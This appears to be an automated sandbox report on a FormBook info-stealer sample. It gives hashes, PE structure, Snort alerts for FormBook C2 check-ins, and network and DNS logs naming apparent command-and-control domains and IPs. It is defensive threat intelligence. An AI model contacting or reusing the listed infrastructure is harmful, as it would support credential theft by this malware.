                                                                                                                                                                                                      anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                      • 91.195.240.19
                                                                                                                                                                                                      Ajanlatkeres_2024.05.29.PDF.exeGet hashmaliciousFormBook, LokibotBrowse
                                                                                                                                                                                                      • 91.195.240.19
                                                                                                                                                                                                      Mekanikken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                      • 91.195.240.19
                                                                                                                                                                                                      Scan Document_doc.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 91.195.240.19
                                                                                                                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 91.195.240.19
                                                                                                                                                                                                      www.free-cell-phones-en-arena.sbsyiLe926pJsBgixu.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 64.190.62.22
                                                                                                                                                                                                      www.spiritualpath.infowkUOj276sJEoMFq.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                      www.warehouse-inventory-80963.bonduBp1DxNGN28IYUZ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 185.53.179.94
                                                                                                                                                                                                      fq.54cdn.vipyiLe926pJsBgixu.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 40.81.24.207
                                                                                                                                                                                                      www.henslotalt.usyiLe926pJsBgixu.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 188.114.97.3

                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      TRELLIAN-AS-APTrellianPtyLimitedAUPO#2492150 May 29 2024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                      • 103.224.212.211
                                                                                                                                                                                                      po8909893299832.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 103.224.212.212
                                                                                                                                                                                                      Ajanlatkeres_2024.05.29.PDF.exeGet hashmaliciousFormBook, LokibotBrowse
                                                                                                                                                                                                      • 103.224.212.213
                                                                                                                                                                                                      http://www.adrus.com/extranet/csxEquipment/EquipmentSpecifications/cs_SpecificationMainPage.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 103.224.182.246
                                                                                                                                                                                                      Details of Your Etisalat Summary Bill for the Month of May 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 103.224.212.212
                                                                                                                                                                                                      file.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                      • 103.224.212.214
                                                                                                                                                                                                      HELP_DECRYPT.HTMLGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 103.224.212.237
                                                                                                                                                                                                      SlHgSOYcMY.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 103.224.212.34
                                                                                                                                                                                                      Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsmGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 103.224.212.214
                                                                                                                                                                                                      Swift Copy.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                      • 103.224.212.217
                                                                                                                                                                                                      CLOUDFLARENETUSfile.xe.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 172.67.196.55
                                                                                                                                                                                                      http://www.sharepoint-atp.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 1.1.1.1
                                                                                                                                                                                                      hhghhg.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      PAYMENT SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 104.21.40.171
                                                                                                                                                                                                      Purchase Order_20240503.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                      Scanned Documents.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                      Reconfirm bank details.rar.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 172.67.137.210
                                                                                                                                                                                                      https://ids.calfrom.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      SecuriteInfo.com.Exploit.CVE-2018-0798.4.4196.18392.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 172.67.175.222
                                                                                                                                                                                                      Setup_v1.9.3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 188.114.96.3

                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                      No context

                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                      No context

                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yPURXYpFVuXra2o.exe.log

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\Desktop\yPURXYpFVuXra2o.exe
                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1577
                                                                                                                                                                                                      Entropy (8bit):5.370304635803193
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:MxHK1Bj1qHDL0HKOYHKh6oPHKObtHoAhAHKzGvj:iq1FwjL0qOYqh6oPqObtIAeqzGb
                                                                                                                                                                                                      MD5:4E503E14E03BC1FCA85A5BD5FDDD4BA7
                                                                                                                                                                                                      SHA1:E78B45726F7B102DAA455D748A0A0583D39C68CD
                                                                                                                                                                                                      SHA-256:2E53E6180FCBD2594BDEF5740C5D692C97D4CF0B3671D445F86F73118E26486F
                                                                                                                                                                                                      SHA-512:0064ED5628F2084EDFB3CE846E4B6FE776C9E8F702BC3495D40B0336592CEE1DE612AF50A2AA7D5439DBF3255DC150BC5F6A75488BEF875B24D0906072413D0C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\9071a2976b2ef0ee49d0396431277b05\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\ca77152be4cd7af9700becb268864b42\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dat

                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                      General

                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                      Entropy (8bit):7.617157252167406
                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                      File name:yPURXYpFVuXra2o.exe
                                                                                                                                                                                                      File size:814'592 bytes
                                                                                                                                                                                                      MD5:6c73961037087d34597fc8a582388bcc
                                                                                                                                                                                                      SHA1:fc96081d921b7f82b9c559ffc335b02364199fd7
                                                                                                                                                                                                      SHA256:93815b97bf6c09abc9e705096381dd25b658853e0751f7b95cc51123c251bcf2
                                                                                                                                                                                                      SHA512:140b6064ecd453809a8a4a8d0fc1f2c82644fa53324c1d1995d4399f7d4f7db14d22dd6cdd9218c17d3d093e5be84667b0ed8f25690d1add9a3e43aa286536ce
                                                                                                                                                                                                      SSDEEP:24576:zMYeWygN5iwSC6OJCa0jIOGFmGJlNmvcu:zMYeqN5idN6X0jvARNmUu
                                                                                                                                                                                                      TLSH:8405DF00F3E83E5BD5BB95BA8134950847F97895709BD6CC6CC078DE8EE6B410B6326B
                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]f..............0..P...........n... ........@.. ....................................@................................

                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                      Icon Hash:31d0f8dac6d6ca74

                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Entrypoint:0x4c6eae
                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                      Time Stamp:0x665D1311 [Mon Jun 3 00:49:21 2024 UTC]
                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                      File Version Major:4
                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      mov al, byte ptr [DC000041h]
                                                                                                                                                                                                      inc edx
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      fadd qword ptr [edx+00h]
                                                                                                                                                                                                      add byte ptr [esi], dl
                                                                                                                                                                                                      inc ebx
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      jo 00007F2221005C94h
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      jo 00007F2221005C94h
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      jo 00007F2221005C94h
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc6e5c0x4f.text
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x1814.rsrc
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                      Sections

                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                      .text0x20000xc4ed40xc5000658fb43ecedc10bd8ffb20b6385f012fFalse0.7797665668623096data7.625137960095419IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .rsrc0xc80000x18140x1a0086660c792535e8b6b6f1cfd30629a5cfFalse0.7578125data6.939057653031406IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .reloc0xca0000xc0x2008de546e2f1fdee73c3fd376c79e1280aFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                      Resources

                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                      RT_ICON0xc80c80x13eaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8976069046684975
                                                                                                                                                                                                      RT_GROUP_ICON0xc94c40x14data1.05
                                                                                                                                                                                                      RT_VERSION0xc94e80x328data0.4381188118811881

                                                                                                                                                                                                      Imports

                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      06/03/24-08:51:59.597269TCP2031412ET TROJAN FormBook CnC Checkin (GET)5042080192.168.11.20172.67.185.213
                                                                                                                                                                                                      06/03/24-08:54:04.267969TCP2031412ET TROJAN FormBook CnC Checkin (GET)5042480192.168.11.2040.81.24.207
                                                                                                                                                                                                      06/03/24-08:55:06.601778TCP2031412ET TROJAN FormBook CnC Checkin (GET)5042580192.168.11.2066.94.112.248
                                                                                                                                                                                                      06/03/24-08:48:54.513491TCP2031412ET TROJAN FormBook CnC Checkin (GET)5041380192.168.11.20172.67.158.76
                                                                                                                                                                                                      06/03/24-08:49:36.291491TCP2031412ET TROJAN FormBook CnC Checkin (GET)5041580192.168.11.2040.81.24.207
                                                                                                                                                                                                      06/03/24-08:53:21.780359TCP2031412ET TROJAN FormBook CnC Checkin (GET)5042280192.168.11.203.33.130.190
                                                                                                                                                                                                      06/03/24-08:53:42.406609TCP2031412ET TROJAN FormBook CnC Checkin (GET)5042380192.168.11.2064.190.62.22
                                                                                                                                                                                                      06/03/24-08:50:16.815432TCP2031412ET TROJAN FormBook CnC Checkin (GET)5041680192.168.11.203.33.130.190
                                                                                                                                                                                                      06/03/24-08:50:57.933052TCP2031412ET TROJAN FormBook CnC Checkin (GET)5041880192.168.11.20104.21.11.125
                                                                                                                                                                                                      06/03/24-08:47:33.122866TCP2031412ET TROJAN FormBook CnC Checkin (GET)5041080192.168.11.20103.224.212.213
                                                                                                                                                                                                      06/03/24-08:47:53.631791TCP2031412ET TROJAN FormBook CnC Checkin (GET)5041180192.168.11.20172.67.182.124
                                                                                                                                                                                                      06/03/24-08:50:37.423270TCP2031412ET TROJAN FormBook CnC Checkin (GET)5041780192.168.11.20103.169.142.0
                                                                                                                                                                                                      06/03/24-08:51:18.553227TCP2031412ET TROJAN FormBook CnC Checkin (GET)5041980192.168.11.2091.195.240.19
                                                                                                                                                                                                      06/03/24-08:48:13.875537TCP2031412ET TROJAN FormBook CnC Checkin (GET)5041280192.168.11.2084.32.84.251
                                                                                                                                                                                                      06/03/24-08:52:40.866374TCP2031412ET TROJAN FormBook CnC Checkin (GET)5042180192.168.11.20104.247.81.94

                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      Jun 3, 2024 08:47:32.961553097 CEST5041080192.168.11.20103.224.212.213
                                                                                                                                                                                                      Jun 3, 2024 08:47:33.122607946 CEST8050410103.224.212.213192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:47:33.122802973 CEST5041080192.168.11.20103.224.212.213
                                                                                                                                                                                                      Jun 3, 2024 08:47:33.122865915 CEST5041080192.168.11.20103.224.212.213
                                                                                                                                                                                                      Jun 3, 2024 08:47:33.326399088 CEST8050410103.224.212.213192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:47:33.339585066 CEST8050410103.224.212.213192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:47:33.339649916 CEST8050410103.224.212.213192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:47:33.339956999 CEST5041080192.168.11.20103.224.212.213
                                                                                                                                                                                                      Jun 3, 2024 08:47:33.339956999 CEST5041080192.168.11.20103.224.212.213
                                                                                                                                                                                                      Jun 3, 2024 08:47:33.501199961 CEST8050410103.224.212.213192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:47:53.501173973 CEST5041180192.168.11.20172.67.182.124
                                                                                                                                                                                                      Jun 3, 2024 08:47:53.631489992 CEST8050411172.67.182.124192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:47:53.631732941 CEST5041180192.168.11.20172.67.182.124
                                                                                                                                                                                                      Jun 3, 2024 08:47:53.631791115 CEST5041180192.168.11.20172.67.182.124
                                                                                                                                                                                                      Jun 3, 2024 08:47:53.762202024 CEST8050411172.67.182.124192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:47:54.139292955 CEST5041180192.168.11.20172.67.182.124
                                                                                                                                                                                                      Jun 3, 2024 08:47:54.270402908 CEST8050411172.67.182.124192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:47:54.270591974 CEST5041180192.168.11.20172.67.182.124

                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      Jun 3, 2024 08:47:32.724881887 CEST6283753192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:47:32.960675001 CEST53628371.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:47:53.092926025 CEST5384653192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:47:53.500461102 CEST53538461.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:48:13.369723082 CEST5480653192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:48:13.634320021 CEST53548061.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:48:33.693263054 CEST5906853192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:48:33.813359976 CEST53590681.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:48:54.235616922 CEST6121453192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:48:54.382339954 CEST53612141.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:49:35.382862091 CEST5060953192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:49:35.934587955 CEST53506091.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:49:56.003293991 CEST5435653192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:49:56.138266087 CEST53543561.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:50:16.545780897 CEST5761153192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:50:16.685075045 CEST53576111.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:50:37.119311094 CEST5711353192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:50:37.292650938 CEST53571131.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:50:57.677490950 CEST5692453192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:50:57.814774990 CEST53569241.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:51:18.188425064 CEST6328253192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:51:18.326195955 CEST53632821.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:51:38.746418953 CEST5586253192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:51:38.885360956 CEST53558621.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:51:59.273076057 CEST5529653192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:51:59.479312897 CEST53552961.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:52:19.815931082 CEST5678453192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:52:19.974755049 CEST53567841.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:52:40.373543024 CEST5997053192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:52:40.552776098 CEST53599701.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:53:03.212203026 CEST5958353192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:53:03.382316113 CEST53595831.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:53:21.458201885 CEST6011653192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:53:21.648458958 CEST53601161.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:53:41.969305038 CEST5901153192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:53:42.181104898 CEST53590111.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:54:02.496020079 CEST5283953192.168.11.201.1.1.1
                                                                                                                                                                                                      Jun 3, 2024 08:54:03.511154890 CEST5283953192.168.11.209.9.9.9
                                                                                                                                                                                                      Jun 3, 2024 08:54:03.913429976 CEST53528399.9.9.9192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:54:04.014054060 CEST53528391.1.1.1192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:54:23.022850990 CEST5895153192.168.11.209.9.9.9
                                                                                                                                                                                                      Jun 3, 2024 08:54:23.153611898 CEST53589519.9.9.9192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:55:06.289402008 CEST6259453192.168.11.209.9.9.9
                                                                                                                                                                                                      Jun 3, 2024 08:55:06.421761036 CEST53625949.9.9.9192.168.11.20
                                                                                                                                                                                                      Jun 3, 2024 08:55:25.243534088 CEST5374453192.168.11.209.9.9.9
                                                                                                                                                                                                      Jun 3, 2024 08:55:25.373941898 CEST53537449.9.9.9192.168.11.20

                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                      Jun 3, 2024 08:47:32.724881887 CEST192.168.11.201.1.1.10xc5d0Standard query (0)www.bolinkpass.clubA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:47:53.092926025 CEST192.168.11.201.1.1.10x385dStandard query (0)www.spiritualpath.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:48:13.369723082 CEST192.168.11.201.1.1.10x4d2Standard query (0)www.sugardefender24-usa.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:48:33.693263054 CEST192.168.11.201.1.1.10x5ad8Standard query (0)www.nff1291.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:48:54.235616922 CEST192.168.11.201.1.1.10xaa58Standard query (0)www.henslotalt.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:49:35.382862091 CEST192.168.11.201.1.1.10x650fStandard query (0)www.65302.vipA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:49:56.003293991 CEST192.168.11.201.1.1.10xb679Standard query (0)www.lotusluxecandle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:50:16.545780897 CEST192.168.11.201.1.1.10x6b21Standard query (0)www.carneden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:50:37.119311094 CEST192.168.11.201.1.1.10x30fStandard query (0)www.pedandmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:50:57.677490950 CEST192.168.11.201.1.1.10x2100Standard query (0)www.junongpei.websiteA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:51:18.188425064 CEST192.168.11.201.1.1.10x5a67Standard query (0)www.winningpickleballshots.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Jun 3, 2024 08:51:38.746418953 CEST192.168.11.201.1.1.10x45d9Standard query (0)www.thetrendingproduct.comA (IP address)IN (0x0001)false
